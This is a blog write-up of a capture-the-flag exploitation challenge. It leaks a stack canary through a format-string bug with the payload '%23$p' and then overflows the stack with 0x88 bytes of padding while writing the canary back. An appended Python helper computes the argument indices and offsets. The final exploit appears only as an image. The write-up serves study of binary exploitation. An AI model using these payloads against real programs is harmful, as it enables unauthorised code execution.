<!-- wp:paragraph --> <p>This is a challenge that combines a format-string bug with a stack overflow, and it was also the first time I smashed a canary :)</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":379,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103135359.png" alt="" class="wp-image-379" style=""></figure></div> <!-- /wp:image -->
<!-- wp:paragraph --> <p>We find that the binary has a stack canary and a non-executable stack.</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>Next, let's take a look in IDA.</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":382,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103140340.png" alt="" class="wp-image-382" style=""></figure></div> <!-- /wp:image -->
<!-- wp:image {"align":"center","id":383,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103140510.png" alt="" class="wp-image-383" style=""></figure></div> <!-- /wp:image -->
<!-- wp:paragraph --> <p>We confirm that there are indeed both a stack overflow and a format-string vulnerability. Because of the canary, the stack overflow cannot be used directly, so we can use the format string to leak the canary first, then write it back unchanged when we overflow the stack, which lets us return to</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":384,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103140912.png" alt="" class="wp-image-384" style=""></figure></div> <!-- /wp:image -->
<!-- wp:paragraph --> <p>here.</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>First, let's leak the canary. Construct the string <code>aaaaaaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p</code> and look at the output:</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":385,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103141145.png" alt="" class="wp-image-385" style=""></figure></div> <!-- /wp:image -->
<!-- wp:paragraph
--> <p>We can see that aaaaaaaa lands at the 6th argument (the first few arguments are the ones that sit before buf on the stack; honestly I don't understand this part very well yet and plan to study it properly later, so for now I'll just use the result). <img class="wp-image-386" style="width: 150px;" src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103141546.png" alt="">Here we see that buf is at 0x90 below rbp and is the 6th argument; (0x90-0x8)/0x8 = 17, so the canary is the 23rd argument, and the format string <code>%23$p</code> leaks the canary's value.</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>With the canary in hand, we can carry out the stack overflow.</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>First we need to know that when a canary is present, the layout of the stack frame changes:</p> <!-- /wp:paragraph -->
<!-- wp:image {"id":387,"sizeSlug":"large"} --> <figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103142350.png" alt="" class="wp-image-387" style=""></figure> <!-- /wp:image -->
<!-- wp:paragraph --> <p>We can also think of it as one extra local variable that must not be modified. Since <img class="wp-image-388" style="width: 150px;" src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103142507.png" alt="">, the offset is 'a'*0x88.</p> <!-- /wp:paragraph -->
<!-- wp:paragraph --> <p>The final exp:</p> <!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":389,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103142652.png" alt="" class="wp-image-389" style=""></figure></div> <!-- /wp:image -->
Last modified: 30 December 2020
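<p>The argument-index arithmetic above (marker at argument 6, buf at rbp-0x90, canary at rbp-0x8, hence <code>%23$p</code> and a 0x88-byte gap) is easy to get wrong by eye. The following helper is an added example, not code from the writeup: it parses a probe output of the <code>aaaaaaaa-%p-%p-...</code> form, derives the indices from the frame offsets, and sanity-checks a leaked qword. The probe output and the leaked value are constructed sample data; the offsets are the ones the writeup reports.</p>

```python
# Added helper, not from the original writeup: it encodes the writeup's by-eye
# reasoning (marker found at argument 6, buf at rbp-0x90, canary at rbp-0x8)
# so the index arithmetic and the leaked value can be checked instead of guessed.
MARKER = b"aaaaaaaa"   # prefix of the probe string "aaaaaaaa-%p-%p-..."
BUF_OFF = 0x90         # buf    = [rbp-0x90]  (offset reported in the writeup)
CANARY_OFF = 0x08      # canary = [rbp-0x8]   (usual x86-64 gcc placement)

# Constructed probe output: five filler stack values, then the marker as the
# 6th %p argument, mirroring the layout the writeup observed.
PROBE_OUTPUT = "aaaaaaaa-" + "-".join([
    "0x7ffdc0ffee10", "0x7f1234567890", "0x7f1234567a10", "(nil)",
    "0x1", "0x6161616161616161", "0x7ffdc0ffef00", "0x0",
])

def stack_arg_index(probe_output: str, marker: bytes = MARKER):
    """Return the 1-based printf argument index whose %p value equals the
    little-endian marker, or None if the marker never shows up."""
    want = int.from_bytes(marker, "little")
    tokens = probe_output.split("-")[1:]          # drop the echoed marker text
    for i, tok in enumerate(tokens, start=1):
        try:
            if int(tok, 16) == want:
                return i
        except ValueError:                         # "(nil)" or a truncated token
            continue
    return None

def canary_arg_index(buf_arg: int, buf_off: int = BUF_OFF,
                     canary_off: int = CANARY_OFF) -> int:
    """buf index + number of 8-byte slots between buf and the canary.
    With the writeup's numbers: 6 + (0x90 - 0x8) // 8 = 6 + 17 = 23."""
    gap = buf_off - canary_off
    if gap <= 0 or gap % 8:
        raise ValueError("canary must sit above buf on a qword boundary")
    return buf_arg + gap // 8

def padding_to_canary(buf_off: int = BUF_OFF, canary_off: int = CANARY_OFF) -> int:
    """Bytes from the start of buf up to the canary: the 'a'*0x88 in the writeup."""
    return buf_off - canary_off

def looks_like_canary(value: int) -> bool:
    """Sanity check on a leaked qword: glibc's x86-64 canary is non-zero and
    its lowest byte is 0x00 (so string functions stop at it)."""
    return 0 < value < (1 << 64) and (value & 0xFF) == 0

def parse_leak(leak_output: str) -> int:
    """Turn the text printed by '%23$p' into an integer."""
    return int(leak_output.strip(), 16)
```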